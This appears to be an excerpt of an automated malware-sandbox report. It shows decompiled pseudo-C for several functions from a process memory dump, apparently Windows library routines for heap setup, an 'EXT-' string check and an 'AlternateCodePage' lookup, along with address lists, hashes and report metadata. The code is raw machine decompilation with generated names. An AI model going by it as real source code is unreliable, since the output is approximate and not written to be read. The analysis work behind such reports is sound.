					 *0x4da6d3c = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L1;
					}
					_t114 = 0;
					__eflags = 0;
					goto L6;
				}
				L1:
				_t91 = 0;
				goto L2;
			}

0x04cea580
0x04cea580
0x04cea580
0x04cea582
0x04cea587
0x04cea58f
0x04cea592
0x04cea595
0x04cea598
0x04cea59a
0x04cea59d
0x04cea5aa
0x04d264a9
0x04d264af
0x04d264d5
0x04d264d5
0x04d264d7
0x04d264f3
0x04d264f3
0x04d264f6
0x04d264f9
0x04d264fb
0x04d26541
0x04d26541
0x04d26543
0x04d26546
0x04d26548
0x04d2654d
0x04d2654e
0x04d26551
0x04d26554
0x04d2656c
0x04d2656f
0x04d2656f
0x04d26571
0x04d26574
0x04d26574
0x04d26577
0x04d2657a
0x00000000
0x00000000
0x00000000
0x00000000
0x04d265b6
0x04d265b6
0x04d265b6
0x04d265b9
0x04d265bc
0x04d265bf
0x00000000
0x00000000
0x04d265c1
0x04d265c1
0x04d265c6
0x04d265c7
0x04d265c7
0x04d2657c
0x04d2657e
0x04d266a5
0x04d266a5
0x04d266a5
0x04d266a8
0x04d266a8
0x04d266ab
0x04d266b2
0x04d266b7
0x04cea5b2
0x04cea5b5
0x04cea5c1
0x04cea5c1
0x04d2658b
0x04d2658d
0x04d26590
0x04d26592
0x00000000
0x00000000
0x04d2659a
0x04d2659b
0x04d2659e
0x04d265a1
0x04d265a5
0x04d265a8
0x04d265aa
0x04d265cc
0x04d265d2
0x04d265f4
0x04d265f4
0x04d265f7
0x04d265f9
0x04d26640
0x04d26640
0x04d26640
0x04d26642
0x04d26644
0x04d26647
0x04d26647
0x04d2664a
0x04d2664d
0x04d2664f
0x04d26652
0x04d26655
0x00000000
0x00000000
0x04d26657
0x04d2665a
0x04d2665d
0x04d2665f
0x04d26668
0x04d2666d
0x04d26670
0x04d26673
0x04d26676
0x04d26676
0x04d2667f
0x04d26681
0x04d26686
0x04d26686
0x04d26689
0x04d2668c
0x04d2668f
0x04d2668f
0x04d26697
0x04d2669a
0x04d2669d
0x04d266a0
0x04d266a0
0x00000000
0x04d2664d
0x04d265fb
0x04d265fe
0x04d26601
0x04d26601
0x04d26604
0x04d26609
0x04d26609
0x04d2660e
0x04d2660e
0x04d26611
0x04d26613
0x04d26616
0x04d26619
0x00000000
0x00000000
0x04d2661b
0x04d2661e
0x04d26629
0x04d2662a
0x04d2662a
0x04d2662c
0x04d2662f
0x04d26632
0x04d26620
0x04d26620
0x04d26622
0x04d26622
0x04d26635
0x04d26639
0x04d2663b
0x00000000
0x04d2663b
0x04d265d4
0x04d265d9
0x04d265db
0x04d265dc
0x04d265df
0x04d265e4
0x04d265e7
0x04d265e7
0x04d265e7
0x04d265ea
0x04d265ed
0x04d265f1
0x00000000
0x04d265f1
0x04d265ac
0x04d265af
0x04d265b1
0x00000000
0x00000000
0x04d265b3
0x00000000
0x04d265b3
0x04d26556
0x04d26559
0x04d2655c
0x04d2655c
0x04d2655f
0x04d26562
0x04d26565
0x00000000
0x00000000
0x04d26567
0x04d26567
0x00000000
0x04d2655c
0x04d26500
0x04d26503
0x04d2650c
0x04d26513
0x04d26515
0x04d2652b
0x04d2652e
0x04d26536
0x04d2653b
0x04d2653b
0x04d2653f
0x04d2653f
0x00000000
0x04d2653f
0x04d26517
0x04d2651a
0x04d26524
0x00000000
0x04d26524
0x04d264d9
0x04d264e0
0x00000000
0x00000000
0x04d264e6
0x04d264ed
0x00000000
0x00000000
0x00000000
0x04d264ed
0x04d264c1
0x04d264c6
0x04d264cb
0x04d264cd
0x00000000
0x00000000
0x04d264d3
0x04d264d3
0x00000000
0x04d264d3
0x04cea5b0
0x04cea5b0
0x00000000

Strings

GlobalTags, xrefs: 04D265D4

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: ee0ab9a95170f1cf66e12cd6fbab27570aa38c88656d6b7b0991d16b4324c7f0
Instruction ID: ba6d3091fe5575e32f26b4d01af1061a651873f0797c68a7c2b2b6771f681d96
Opcode Fuzzy Hash: ee0ab9a95170f1cf66e12cd6fbab27570aa38c88656d6b7b0991d16b4324c7f0
Instruction Fuzzy Hash: 9A717E75E0032A9FDF24CF98D6806ADB7B2FF68718F14816EE445A7244E735E901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04D70EAD Relevance: 1.4, Strings: 1, Instructions: 188
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04D70EAD(signed int __ecx, intOrPtr* __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed short _v12;
				intOrPtr* _v16;
				signed int _v20;
				short _v22;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				void* _v44;
				void* __ebx;
				intOrPtr* _t110;
				intOrPtr* _t114;
				signed int _t120;
				void* _t125;
				signed int _t126;
				signed int _t129;
				intOrPtr _t130;
				char* _t137;
				intOrPtr* _t157;
				signed int _t162;
				intOrPtr _t164;
				signed int _t167;
				signed short* _t171;
				signed int _t172;
				intOrPtr* _t175;
				signed int _t188;
				signed short _t192;
				signed short _t195;
				intOrPtr _t196;
				signed short _t206;
				unsigned int _t208;
				intOrPtr _t209;
				intOrPtr* _t215;
				signed int _t219;

				_t157 = __edx;
				_v20 = __ecx;
				_v36 = __edx;
				if((_a8 & 0x00000003) != 0) {
					_t162 =  *(__edx + 0x1b) & 0x000000ff;
					_t188 =  *(_a20 + 2) & 0x000000ff;
					_v40 =  *((intOrPtr*)(__edx + 0x10));
					if(_t162 != 0) {
						_t110 =  *((intOrPtr*)(__ecx + 0x5c4 + _t188 * 4)) + 0xffffff98 + _t162 * 0x68;
					} else {
						_t110 =  *((intOrPtr*)(__ecx + 0x3c0 + _t188 * 4));
					}
					_t164 = _a12;
					_v16 = _t110;
					_v8 = (_t164 + 0x00001007 & 0xfffff000) + 0x1000;
					_t114 = _a4;
					 *_t114 = _t157;
					_t192 = (_t114 - (_t114 + 0x0000101f & 0xfffff000) + _a16) / _v8;
					 *((short*)(_t157 + 0x14)) = _t164 + 8 >> 3;
					_t120 = _t192 & 0x0000ffff;
					_v32 = _t120;
					 *(_t157 + 0x18) = _t120;
					 *_t157 = _v16;
					_v12 = _t192;
					 *((char*)(_t157 + 0x1a)) =  *(_a20 + 2);
					 *((short*)(_t157 + 0x16)) = _a8;
					_v22 = _v8;
					_t125 = E04D70DBF(_t157, _t114 + 0x0000101f & 0xfffff000);
					_t167 =  *0x4da6964; // 0x3a6c28e9
					_t126 = _a4;
					_t206 = _t125 - _t126;
					_v24 = _t206;
					 *(_t126 + 0x10) = _t167 ^ _v24 ^ _v20 ^ _t126;
					_t171 = _t126 + 0x14;
					 *_t171 = _v12;
					_t171[2] = _t126 + 0x1c;
					E04D79D29(_t171);
					_t172 = _a4;
					_t195 = 0;
					_t208 = (_t206 & 0x0000ffff) + _t172;
					_v24 = 0;
					if(_v12 <= 0) {
						L9:
						 *(_t157 + 4) = _t172;
						 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
						 *(_t157 + 0xc) =  *(_t157 + 0xc) & 0x00000000;
						_t215 = _v16 + 0x50;
						do {
							_t129 =  *_t215;
							_t209 =  *((intOrPtr*)(_t215 + 4));
							_v28 = _t129;
							if(_v12 <= 0) {
							}
							_t196 = _t209;
							asm("lock cmpxchg8b [esi]");
						} while (_t129 != _v28 || _t196 != _t209);
						_t175 = _v16;
						_v24 = _v24 & 0x00000000;
						_t130 =  *_t175;
						 *((intOrPtr*)(_t130 + 0x10)) =  *((intOrPtr*)(_t130 + 0x10)) + 1;
						 *((intOrPtr*)(_t175 + 0x58)) =  *((intOrPtr*)(_t130 + 0x10));
						_v24 = _v32;
						asm("lock or [eax], ecx");
						_t210 = _v36;
						 *((intOrPtr*)(_a4 + 0xc)) = 0xf0e0d0c0;
						 *((intOrPtr*)(_v36 + 0x1c)) = 1;
						asm("lock cmpxchg [edx], ecx");
						if(E04CC3C40() == 0) {
							_t137 = 0x7ffe0380;
						} else {
							_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t137 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E04D6F68C(1,  *((intOrPtr*)(_v20 + 0xc)),  *((intOrPtr*)(_t210 + 4)),  *(_t210 + 0x14) & 0x0000ffff,  *(_t210 + 0x18) & 0x0000ffff,  *(_t210 + 0x1b) & 0x000000ff);
						}
						return 1;
					} else {
						_v28 = _v8 << 0xd;
						_t219 = _t208 - _t172 << 0xd;
						do {
							 *_t208 = _t208 >> 0x00000003 ^ _t219 ^  *0x4da6964 ^  *(_v20 + 0xc);
							 *(_t208 + 4) = (_t195 & 0x0000ffff) << 0x00000008 |  *(_t208 + 4) & 0xff0000ff;
							 *((char*)(_t208 + 7)) = 0x80;
							E04D70E4F(_t157, _t208);
							_t208 = _t208 + _v8;
							_t219 = _t219 + _v28;
							_t195 = _v24 + 1;
							_v24 = _t195;
						} while (_t195 < _v12);
						_t172 = _a4;
						goto L9;
					}
				}
				return 0;
			}

0x04d70ebc
0x04d70ebe
0x04d70ec1
0x04d70ec4
0x04d70ed4
0x04d70ed8
0x04d70edc
0x04d70ee2
0x04d70efa
0x04d70ee4
0x04d70ee4
0x04d70ee4
0x04d70efc
0x04d70f04
0x04d70f14
0x04d70f17
0x04d70f1a
0x04d70f2e
0x04d70f39
0x04d70f3d
0x04d70f40
0x04d70f43
0x04d70f4a
0x04d70f4e
0x04d70f56
0x04d70f5d
0x04d70f64
0x04d70f68
0x04d70f6d
0x04d70f75
0x04d70f78
0x04d70f7d
0x04d70f89
0x04d70f8c
0x04d70f92
0x04d70f94
0x04d70f97
0x04d70f9c
0x04d70f9f
0x04d70fa4
0x04d70fa6
0x04d70fac
0x04d71008
0x04d7100b
0x04d7100e
0x04d71012
0x04d71016
0x04d71019
0x04d71019
0x04d71020
0x04d71023
0x04d7102c
0x04d7102c
0x04d71031
0x04d71034
0x04d71038
0x04d71041
0x04d71044
0x04d71048
0x04d7104a
0x04d71050
0x04d71058
0x04d7105f
0x04d71067
0x04d7106e
0x04d7107b
0x04d7107e
0x04d71089
0x04d7109b
0x04d7108b
0x04d71094
0x04d71094
0x04d710a3
0x04d710cf
0x04d710cf
0x00000000
0x04d70fae
0x04d70fb8
0x04d70fbb
0x04d70fbe
0x04d70fd1
0x04d70fe5
0x04d70fea
0x04d70fee
0x04d70ff6
0x04d70ff9
0x04d70ffc
0x04d70ffd
0x04d71000
0x04d71005
0x00000000
0x04d71005
0x04d70fac
0x00000000

Strings

(l:, xrefs: 04D70F6D

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: (l:
API String ID: 0-306572087
Opcode ID: 320e76653fccd2e01990645f4a45c3f4e0bfedb5df07b40092a15c60d09b9c8f
Instruction ID: 52843e49cba7ff68d7d75a113828b5ce5ee71f31b1915d3f72e055de93c2ec82
Opcode Fuzzy Hash: 320e76653fccd2e01990645f4a45c3f4e0bfedb5df07b40092a15c60d09b9c8f
Instruction Fuzzy Hash: B5817075A00255DFCB09CF68C490AAEB7F1FF48304F1581A9E859EB355E734EA51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CC02F9 Relevance: 1.4, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04CC02F9(void* __ecx, signed char* __edx, signed char* _a4, signed short* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				signed char* _v28;
				signed short* _v32;
				void* _v36;
				signed char* _v40;
				char _v44;
				intOrPtr _v48;
				signed short _v56;
				signed short _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t73;
				signed char* _t76;
				signed char* _t78;
				intOrPtr _t93;
				void* _t124;
				signed short* _t125;
				signed char* _t131;
				signed char* _t150;
				void* _t153;
				void* _t154;
				signed int _t156;

				_t142 = __edx;
				_t126 = __ecx;
				_v8 =  *0x4dab370 ^ _t156;
				_v40 = _a4;
				_t124 = __ecx;
				_v28 = __edx;
				_v32 = _a8;
				_t73 = E04CC3C40();
				_t150 = 0x7ffe0384;
				if(_t73 != 0) {
					_t76 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t76 = 0x7ffe0384;
				}
				_t152 = 0x7ffe0385;
				if( *_t76 != 0) {
					if(E04CC3C40() == 0) {
						_t78 = 0x7ffe0385;
					} else {
						_t78 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t78 & 0x00000010) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04CC3C40() != 0) {
						_t96 = ( *[fs:0x30])[0x50] + 0x22a;
					} else {
						_t96 = _t150;
					}
					if( *_t96 != 0) {
						_t96 =  *[fs:0x30];
						if((( *[fs:0x30])[0x240] & 0x00000004) == 0) {
							goto L6;
						}
						if(E04CC3C40() != 0) {
							_t96 =  *[fs:0x30];
							_t152 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t152 & 0x00000020) != 0) {
							L18:
							_t152 = _v28;
							_v36 =  *((intOrPtr*)(_t124 + 0x18)) + _v28[4];
							E04CF4FD0(_t126,  &_v56,  *((intOrPtr*)(_t124 + 0x18)) + _v28[4]);
							_t127 = _t124;
							E04D2F899(_t124, _v28, _v32,  &_v36,  &_v44);
							_t86 = _v36;
							if(_v36 == 0) {
								E04CFFF70( &_v20, 0xc, "#%u", _v44);
								_t86 =  &_v20;
							}
							E04CF4FD0(_t127,  &_v64, _t86);
							_t142 = _v40;
							_t125 = _t124 + 0x24;
							_v32 = _t125;
							_t131 = (_v40[0x24] & 0x0000ffff) + 8 + ((_v64 & 0x0000ffff) + (_v56 & 0x0000ffff)) * 2 + ( *_t125 & 0x0000ffff);
							_t93 =  *0x4da5d78; // 0x0
							_v28 = _t131;
							_v48 = _t131 + 0x24;
							_t124 = E04CC5D90(_t131 + 0x24, ( *[fs:0x30])[0x18], _t93 + 0x180000, _t131 + 0x24);
							if(_t124 != 0) {
								_t43 = _t124 + 0x24; // 0x24
								_t153 = _t43;
								 *((short*)(_t124 + 6)) = 0x14d6;
								 *((intOrPtr*)(_t124 + 0x20)) = 3;
								E04D2FD65(_v32, _t153, _v28,  &_v24);
								_t154 = _t153 + _v24;
								_v28 = _v28 - _v24;
								E04D2FD65( &(_v40[0x24]), _t154, _v28 - _v24,  &_v24);
								_t152 = _t154 + _v24;
								_v28 = _v28 - _v24;
								E04D2FD20( &_v56, _t152, _v28 - _v24,  &_v24);
								_t142 = _v24 + _t152;
								E04D2FD20( &_v64, _v24 + _t152, _v28 - _v24,  &_v24);
								if(E04CC3C40() != 0) {
									_t150 = ( *[fs:0x30])[0x50] + 0x22a;
								}
								_push(_t124);
								_push(_v48 + 0xffffffe0);
								_push(0x402);
								_push( *_t150 & 0x000000ff);
								E04CF2F90();
								_t96 = E04CC3BC0(( *[fs:0x30])[0x18], 0, _t124);
							}
						}
						goto L6;
					} else {
						L6:
						return E04CF4B50(_t96, _t124, _v8 ^ _t156, _t142, _t150, _t152);
					}
				}
			}

0x04cc02f9
0x04cc02f9
0x04cc0308
0x04cc0310
0x04cc0313
0x04cc0319
0x04cc031c
0x04cc031f
0x04cc0324
0x04cc032b
0x04d14ae2
0x04cc0331
0x04cc0331
0x04cc0331
0x04cc0336
0x04cc033b
0x04d14af3
0x04d14b05
0x04d14af5
0x04d14afe
0x04d14afe
0x04d14b0a
0x00000000
0x04d14b0c
0x00000000
0x04d14b0c
0x04cc0341
0x04cc0341
0x04cc0348
0x04d14b1a
0x04cc034e
0x04cc034e
0x04cc034e
0x04cc0353
0x04d14b24
0x04d14b31
0x00000000
0x00000000
0x04d14b3e
0x04d14b40
0x04d14b49
0x04d14b49
0x04d14b52
0x04d14b58
0x04d14b58
0x04d14b62
0x04d14b69
0x04d14b77
0x04d14b7d
0x04d14b82
0x04d14b87
0x04d14b97
0x04d14b9f
0x04d14b9f
0x04d14ba7
0x04d14bac
0x04d14baf
0x04d14bbc
0x04d14bcc
0x04d14bce
0x04d14bd3
0x04d14be6
0x04d14bf1
0x04d14bf5
0x04d14bfe
0x04d14bfe
0x04d14c09
0x04d14c14
0x04d14c1b
0x04d14c29
0x04d14c33
0x04d14c39
0x04d14c47
0x04d14c4e
0x04d14c54
0x04d14c69
0x04d14c6c
0x04d14c78
0x04d14c83
0x04d14c83
0x04d14c8c
0x04d14c90
0x04d14c94
0x04d14c99
0x04d14c9a
0x04d14cab
0x04d14cab
0x04d14bf5
0x00000000
0x04cc0359
0x04cc0359
0x04cc0367
0x04cc0367
0x04cc0353

Strings

#%u, xrefs: 04D14B8F

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: 91a426848dc6d131485189f523f5bea67aff233f37601042777c36e901d67edc
Instruction ID: 15a45624301dff47ca029e169a66c25ac2a557aaec28c85e4fe7becf9e40a1cb
Opcode Fuzzy Hash: 91a426848dc6d131485189f523f5bea67aff233f37601042777c36e901d67edc
Instruction Fuzzy Hash: B1714C71A00149AFDB05DF99D980FAEB7F9FF08708F184069E905E7261E634E941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CCE547 Relevance: 1.4, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E04CCE547(unsigned int __ecx, void* __edx, void* __eflags) {
				char _v24;
				char _v32;
				unsigned int _v36;
				short _v38;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				signed short _v50;
				unsigned int _v52;
				char _v56;
				char _v57;
				intOrPtr _v60;
				char _v61;
				char _v73;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t47;
				intOrPtr _t51;
				void* _t55;
				char _t60;
				void* _t68;
				void* _t78;
				unsigned int _t81;
				unsigned int _t82;
				void* _t94;
				void* _t95;
				void* _t97;
				unsigned int _t99;
				short _t100;
				signed int _t101;
				void* _t103;

				_t82 = __ecx;
				_t103 = (_t101 & 0xfffffff8) - 0x2c;
				_v44 = _v44 & 0x00000000;
				_push(_t78);
				_push(_t97);
				_push(_t94);
				_push( &_v44);
				_push(0);
				_push(0x4c81050);
				E04CCF2F0(_t78, _t94, _t97, __eflags);
				_t95 = E04CBDE20(_t82, __eflags, _v56, 1, 0xd,  &_v52);
				if(_t95 == 0) {
					_t47 = 0;
					L15:
					return _t47;
				}
				_t99 = 0;
				_t81 = _v52 >> 5;
				_v44 =  *( *[fs:0x30] + 0x38);
				_v40 = 0;
				_v36 = 0;
				_v52 = 0;
				if(_t81 == 0) {
					L14:
					_t47 = _t99;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t51 =  *((intOrPtr*)(_t95 + 4));
					if(_t51 == 0) {
						break;
					}
					_push(4);
					_v48 = _t51 + _v56;
					_t55 = E04CF74B0(_t51 + _v56, "EXT-");
					_t103 = _t103 + 0xc;
					_t108 = _t55;
					if(_t55 != 0) {
						L11:
						_t95 = _t95 + 0x20;
						_t82 = _v52 + 1;
						_v52 = _t82;
						if(_t82 < _t81) {
							continue;
						}
						break;
					}
					E04CF5010(_t82,  &_v32, _v48);
					_t100 = E04CAADA0(_t82, _t108,  &_v40);
					if(_t100 > (_v50 & 0x0000ffff)) {
						__eflags = _t100 - 0xfffe;
						if(_t100 >= 0xfffe) {
							_t99 = 0xc0000095;
							break;
						}
						__eflags = _v36;
						if(_v36 != 0) {
							E04CC3B90( &_v40);
						}
						_t60 = E04CC5D60(_t100);
						_v40 = _t60;
						__eflags = _t60;
						if(_t60 == 0) {
							_t99 = 0xc000009a;
							break;
						} else {
							_v38 = _t100;
							L6:
							E04CCC560( &_v40,  &_v32, 0);
							E04CCDF36(0,  &_v52, 0x14d0);
							_t99 = E04CD015C(_v60,  &_v56, 0,  &_v73,  &_v40);
							if(_t99 < 0 || _v57 == 0) {
								_t68 = 0x14d3;
							} else {
								_t68 = (0 | _v24 == 0x00000000) + 0x14d1;
							}
							E04CCDF36(0,  &_v40, _t68);
							if(_v61 != 0 && E04CD04C0(0x4c81174,  &_v24, 1) == 0) {
								_t99 = E04CCE4F8(_v56, _t95);
								__eflags = _t99;
								if(_t99 < 0) {
									break;
								}
								_t99 = 0;
							}
							goto L11;
						}
					}
					_v40 = 0;
					goto L6;
				}
				if(_v36 != 0) {
					E04CC3B90( &_v40);
				}
				goto L14;
			}

0x04cce547
0x04cce54f
0x04cce552
0x04cce55b
0x04cce55c
0x04cce55d
0x04cce55e
0x04cce55f
0x04cce561
0x04cce566
0x04cce57d
0x04cce581
0x04cce706
0x04cce6b9
0x04cce6bf
0x04cce6bf
0x04cce58d
0x04cce593
0x04cce599
0x04cce59f
0x04cce5a3
0x04cce5a7
0x04cce5ad
0x04cce6b7
0x04cce6b7
0x00000000
0x00000000
0x00000000
0x00000000
0x04cce5b3
0x04cce5b3
0x04cce5b3
0x04cce5b8
0x00000000
0x00000000
0x04cce5c2
0x04cce5ca
0x04cce5ce
0x04cce5d3
0x04cce5d6
0x04cce5d8
0x04cce692
0x04cce696
0x04cce699
0x04cce69a
0x04cce6a0
0x00000000
0x00000000
0x00000000
0x04cce6a0
0x04cce5e7
0x04cce5fb
0x04cce5ff
0x04cce6d5
0x04cce6db
0x04cce711
0x00000000
0x04cce711
0x04cce6dd
0x04cce6e2
0x04cce6e9
0x04cce6e9
0x04cce6ef
0x04cce6f4
0x04cce6f8
0x04cce6fa
0x04cce70a
0x00000000
0x04cce6fc
0x04cce6fc
0x04cce60c
0x04cce618
0x04cce628
0x04cce646
0x04cce64a
0x04d1986f
0x04cce65b
0x04cce665
0x04cce665
0x04cce671
0x04cce67b
0x04cce6cb
0x04cce6cd
0x04cce6cf
0x00000000
0x00000000
0x04cce6d1
0x04cce6d1
0x00000000
0x04cce67b
0x04cce6fa
0x04cce607
0x00000000
0x04cce607
0x04cce6ab
0x04cce6b2
0x04cce6b2
0x00000000

Strings

EXT-, xrefs: 04CCE5C4

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 79f231dee0fb3da806f18179045c0c3906bf40d9610fa1fdf5f83e820fdeac3f
Instruction ID: 11b23b7907c52d848087fe268b832c875427ca5dd0fd1843616631593676449d
Opcode Fuzzy Hash: 79f231dee0fb3da806f18179045c0c3906bf40d9610fa1fdf5f83e820fdeac3f
Instruction Fuzzy Hash: C141F4726143159BD710DF65C844F6FB3EAAF89718F04092DF584D7180E774EA04D792

Uniqueness

Uniqueness Score: -1.00%

Function 04CACD8A Relevance: 1.4, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04CACD8A(intOrPtr __ecx, void* __edx, void* __eflags) {
				unsigned int _v8;
				char _v12;
				char _v16;
				unsigned int _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				signed int _t45;
				unsigned int _t49;
				signed int _t50;
				signed int _t56;
				void* _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				signed int _t64;
				signed int _t67;
				unsigned int _t68;
				signed int _t70;
				intOrPtr _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				signed int _t78;
				void* _t82;
				intOrPtr _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;

				_t86 = 0;
				_v12 = 7;
				_v24 = 0;
				_t62 = __ecx;
				_v20 = 0;
				_t87 = __edx;
				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				E04CF5050(__ecx,  &_v36, L"AlternateCodePage");
				_push(__ecx);
				_t42 = E04CAD64A(_t87,  &_v36,  &_v12, 0,  &_v8);
				if(_t42 != 0xc0000034) {
					_t67 = _v8;
					__eflags = _t67;
					if(_t67 == 0) {
						goto L1;
					}
					__eflags = _t42 - 0x80000005;
					if(_t42 != 0x80000005) {
						goto L1;
					}
					_t68 = _t67 + 2;
					_v8 = _t68;
					_t70 = _t68 + 0x00000003 & 0xfffffffc;
					__eflags = _t70;
					if(_t70 != 0) {
						_t42 = E04CC5D90(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t70);
						_t86 = _t42;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						goto L1;
					}
					_push(_t70);
					_t45 = E04CAD64A(_t87,  &_v36,  &_v12, _t86,  &_v8);
					__eflags = _t45;
					if(_t45 != 0) {
						L22:
						return E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t86);
					}
					__eflags = _v12 - 1;
					if(_v12 == 1) {
						L10:
						_t88 = _t86;
						_t49 = _v8 >> 1;
						__eflags = _t49;
						_t72 = 0;
						_v8 = _t49;
						_v12 = _t72;
						if(_t49 == 0) {
							goto L22;
						}
						_t64 = _t62 + 0x14;
						__eflags = _t64;
						while(1) {
							__eflags = _t88;
							if(_t88 == 0) {
								goto L22;
							}
							__eflags =  *_t88 - _t72;
							if( *_t88 == _t72) {
								goto L22;
							}
							_t50 = E04CF79A0(_t88, "*");
							_pop(_t74);
							__eflags = _t50;
							if(_t50 == 0) {
								_t75 = _t74 | 0xffffffff;
								__eflags = _t75;
								 *(_v28 + 0x14) = _t75;
								goto L22;
							}
							E04CF5050(_t74,  &_v36, _t88);
							_push( &_v16);
							_push(0xa);
							_push( &_v36);
							_t56 = E04CE07D0(_t64, _t86, _t88, __eflags);
							__eflags = _t56;
							if(_t56 != 0) {
								L17:
								_t76 = _t88;
								_t28 = _t76 + 2; // 0x2
								_t82 = _t28;
								do {
									_t57 =  *_t76;
									_t76 = _t76 + 2;
									__eflags = _t57 - _v24;
								} while (_t57 != _v24);
								_t78 = _t76 - _t82 >> 1;
								_t85 = _v12 + 1 + _t78;
								_v12 = _t85;
								_t88 = _t88 + _t78 * 2 + 2;
								_t72 = 0;
								__eflags = _t85 - _v8;
								if(_t85 < _v8) {
									continue;
								}
								goto L22;
							}
							 *_t64 = _v16;
							_t64 = _t64 + 2;
							_t60 = _v20 + 1;
							_v20 = _t60;
							__eflags = _t60 - 4;
							if(_t60 >= 4) {
								goto L22;
							}
							goto L17;
						}
						goto L22;
					}
					__eflags = _v12 - 7;
					if(_v12 != 7) {
						goto L22;
					}
					goto L10;
				}
				L1:
				return _t42;
			}

0x04cacd95
0x04cacd97
0x04cacda6
0x04cacda9
0x04cacdab
0x04cacdaf
0x04cacdb1
0x04cacdb4
0x04cacdb7
0x04cacdba
0x04cacdbf
0x04cacdce
0x04cacdd8
0x04d0a275
0x04d0a278
0x04d0a27a
0x00000000
0x00000000
0x04d0a280
0x04d0a285
0x00000000
0x00000000
0x04d0a28b
0x04d0a28e
0x04d0a294
0x04d0a294
0x04d0a297
0x04d0a2a5
0x04d0a2aa
0x04d0a2aa
0x04d0a2ac
0x04d0a2ae
0x00000000
0x00000000
0x04d0a2b4
0x04d0a2c3
0x04d0a2c8
0x04d0a2ca
0x04d0a382
0x00000000
0x04d0a38f
0x04d0a2d0
0x04d0a2d4
0x04d0a2e0
0x04d0a2e3
0x04d0a2e7
0x04d0a2e7
0x04d0a2e9
0x04d0a2ea
0x04d0a2ed
0x04d0a2f0
0x00000000
0x00000000
0x04d0a2f6
0x04d0a2f6
0x04d0a2f9
0x04d0a2f9
0x04d0a2fb
0x00000000
0x00000000
0x04d0a301
0x04d0a304
0x00000000
0x00000000
0x04d0a30c
0x04d0a312
0x04d0a313
0x04d0a315
0x04d0a37b
0x04d0a37b
0x04d0a37e
0x00000000
0x04d0a37e
0x04d0a31c
0x04d0a324
0x04d0a325
0x04d0a32a
0x04d0a32b
0x04d0a330
0x04d0a332
0x04d0a34a
0x04d0a34a
0x04d0a34c
0x04d0a34c
0x04d0a34f
0x04d0a34f
0x04d0a352
0x04d0a355
0x04d0a355
0x04d0a360
0x04d0a363
0x04d0a367
0x04d0a36d
0x04d0a370
0x04d0a371
0x04d0a374
0x00000000
0x00000000
0x00000000
0x04d0a376
0x04d0a338
0x04d0a33b
0x04d0a341
0x04d0a342
0x04d0a345
0x04d0a348
0x00000000
0x00000000
0x00000000
